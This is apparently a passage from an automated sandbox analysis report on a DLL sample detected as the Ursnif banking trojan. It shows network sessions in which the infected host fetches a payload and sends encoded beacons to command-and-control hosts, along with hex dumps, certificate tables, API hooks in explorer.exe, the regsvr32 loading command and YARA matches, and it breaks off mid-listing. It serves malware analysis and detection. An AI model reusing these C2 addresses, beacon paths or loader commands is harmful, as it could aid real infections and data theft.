0f 18 74 fd 12 89 50 ca 7f 95 5e cd b5 30 ed 73 02 4d ec 8d 0e fd 6a 8f 0f da 19 f4 c1 29 eb 63 52 47 f1 ce 75 99 1f a8 ab b7 5d e0 01 7b 63 e8 a3 2a 8a 29 e0 2c ab fb a8 d5 b7 a0 1b 15 fd a7 ad 41 18 48 22 e2 d4 38 f9 9c 35 fc 68 a4 a6 73 e4 17 a6 16 e5 90 0a 7c e9 12 c4 d4 42 af 20 53 e5 0d 82 c1 75 23 a0 da 29 78 00 6c 96 a6 b6 f0 b2 79 50 06 8b 8d 2e 02 32 5d 59 db de 2a 32 51 3b 0f f5 98 d5 90 e7 2c 7f 06 f2 ea 77 56 4b 3d 0a a4 93 d9 56 ad c5 34 a9 de 9d 38 55 c9 0a 16 a6 fe 75 f3 6e 90 f4 ec 0d 36 62 44 46 cb c3 58 ac 57 f0 99 73 4d da be 94 43 fe b3 08 9c 2e e9 a7 a1 d7 81 0c 6a ef e0 04 38 67 b6 ca 8b 92 ac e9 da 9e da 9b 01 31 84 4c e0 20 e9 ea c0 df 5e a6 72 73 1b a0 2f 9d 2e cc ce 52 45 79 86 4d b4 30 84 ce c2 4a ee a4 ba b5 15 ce f4 61 a3 d3 79 43 24 bf 0f 43 7c ff c0 cc 2b 95 da dc cb 22 a5 92 42 4d 22 3a 81 36 29 0b 65 c7 aa 04 c9 2a 2b b0 64 0f 11 06 cc ba 7e be df 28 6e 54 a5 32 6c 65 68 e7 f9 07 6e 08 80 ea 46 14 a1 19 01 c9 3c 88 40 2b b0 05 d6 aa 94 1b 6a a7 ab ce e4 84 d8 5c be ce df 6d 1c 47 d8 88 00 c1 81 61 93 7c dc 1d c0 25 b1 8a 12 5c 2b af c4 07 a2 d2 d9 6f 70 2d ff 42 85 e4 9f 43 10 83 a9 d9 91 44 72 12 00 65 f4 0f f9 5b c1 46 b7 42 8c 2c 85 17 d5 a5 c2 60 d0 68 fa 83 d4 c6 c5 a4 05 25 0a aa c0 bc 66 ae 9b d3 f8 8b 2e c1 d9 f3 88 fe cb 5e 25 25 e6 3b 24 51 9d e8 57 11 cc 97 43 ed 62 f3 e7 14 a5 ed 3a 78 b9 0b 64 e9 9a 69 a9 ac 80 4c fb d4 7a 6c 4d bf a6 fe a8 be 6d 94 af 0e 84 13 96 c0 1f 95 3f 35 51 33 8d bf 4e 40 d7 d6 a8 5a d1 a6 ab 93 ac af 5d ed 9c 3b 0a f3 1b f8 9e 05 c0 5a 81 8e 5f a3 ff 42 38 c4 15 8e f4 c5 f4 84 12 a3 0f ae 1c 79 5f 55 04 71 ab 16 86 04 b5 26 45 c1 1e f1 0c d3 6d 93 da 34 92 07 29 0f 7d f3 b1 f0 42 0c 74 23 e1 07 09 aa 17 e3 3a 76 23 0c 27 41 95 44 1b cc c0 6c b1 67 1c 49 a3 fd 27 48 25 64 b9 21 aa 4b a5 07 b1 fe ca 41 9c 84 f4 bd 6d 51 c8 04 17 f0 51 73 39 51 2e 39 77 0f 2b f9 78 55 85 fe 06 3a 57 c8 b2 aa 51 1a bf b1 b6 f5 9c 21 0b fe 10 47 5d 37 d1 ca a3 c0 65 27 b8 4c 75 4f d1 c8 ac f3 9c 92 f6 09 86 93 59 48 bc 93 36 32 ab 8a de 24 16 3a fa cb 81 c4 5f 96 b7 ed f2 18 89 8f d0 9a 35 54 d6 57 2c 56 60 5c 98 bf 0e 12 af d4 7d 88 2e 5b 63 f9 c6 20 c6 93 Data Ascii: 76c5CD[3I$wI0_TvfWmO]E>-xw4gQcg~5ira{duSNN&Zn\|:Unj>==M6,k5g2pb8z6R$PG6[1o@-AAOke%q <<fGG[oM/]vIl+]auJsrutOb'crtP^0sMj)cRGu]{c),AH"85hs\|B Su#)xlyP.2]Y2Q;,wVK=V48Uun6bDFXWsMC.j8g1L ^rs/.REyM0JayC$C\|+"BM":6)e+d~(nT2lehnF<@+j\mGa\|%\+op-BCDre[FB,`h%f.^%%;$QWCb:xdiLzlMm?5Q3N@Z];Z_B8y_Uq&Em4)}Bt#:v#'ADlgI'H%d!KAmQQs9Q.9w+xU:WQ!G]7e'LuOYH62$:_5TW,V`\}.[c

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49798	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:58:56.246588945 CET	8581	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Feb 16, 2021 00:58:56.371509075 CET	8582	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 23:58:56 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49800	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:59:05.558873892 CET	8800	OUT	GET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Feb 16, 2021 00:59:06.251410007 CET	8803	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 23:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49801	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:59:06.736301899 CET	8804	OUT	POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Content-Length: 2 Host: api3.lepini.at
Feb 16, 2021 00:59:07.282991886 CET	8805	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 23:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 35 0d 0a 60 ad a4 27 b0 ce 61 26 a1 58 39 2f 9e eb 43 22 6a 80 de 19 83 22 06 4c 6d f8 81 7a 7b 73 26 7a d9 cc 1c 6c 65 78 f9 ac 3c c6 eb 80 3f f4 d9 2f 07 ba d1 fc 2b c1 29 3d c1 75 94 c2 7b 1b 33 56 19 43 35 57 2b 94 1a bc 4e 5c 60 be 72 f7 f5 20 5e e4 a3 9c 36 ff 57 a2 71 7e 66 46 40 2a 3e c9 f2 4d bf 40 9e ed 97 6f b0 79 e9 69 00 de d2 ef 1f 4b aa 01 e4 0d 0a 30 0d 0a 0d 0a Data Ascii: 75`'a&X9/C"j"Lmz{s&zlex<?/+)=u{3VC5W+N\`r ^6Wq~fF@*>M@oyiK0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49802	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:59:08.534192085 CET	8806	OUT	GET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Feb 16, 2021 00:59:08.940006018 CET	8849	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 23:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 16, 2021 00:57:34.812472105 CET	104.20.184.68	443	192.168.2.4	49746	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:34.812472105 CET	104.20.184.68	443	192.168.2.4	49746	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:34.844383001 CET	104.20.184.68	443	192.168.2.4	49747	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:34.844383001 CET	104.20.184.68	443	192.168.2.4	49747	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.578773975 CET	151.101.1.44	443	192.168.2.4	49764	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.578773975 CET	151.101.1.44	443	192.168.2.4	49764	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.584134102 CET	151.101.1.44	443	192.168.2.4	49763	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.584134102 CET	151.101.1.44	443	192.168.2.4	49763	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.584671021 CET	151.101.1.44	443	192.168.2.4	49759	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.584671021 CET	151.101.1.44	443	192.168.2.4	49759	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.585233927 CET	151.101.1.44	443	192.168.2.4	49760	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.585233927 CET	151.101.1.44	443	192.168.2.4	49760	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.601056099 CET	151.101.1.44	443	192.168.2.4	49761	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.601056099 CET	151.101.1.44	443	192.168.2.4	49761	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.601790905 CET	151.101.1.44	443	192.168.2.4	49762	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 16, 2021 00:57:39.601790905 CET	151.101.1.44	443	192.168.2.4	49762	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DA719C

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFABB03521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFABB035200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFABB03520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DA719C

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5576 Parent PID: 5812

General

Start time:	00:57:28
Start date:	16/02/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll'
Imagebase:	0x870000
File size:	121856 bytes
MD5 hash:	8081BC925DFC69D40463079233C90FA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exe PID: 5876 Parent PID: 5576

General

Start time:	00:57:28
Start date:	16/02/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
Imagebase:	0x1280000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, Author: Joe Security Rule: 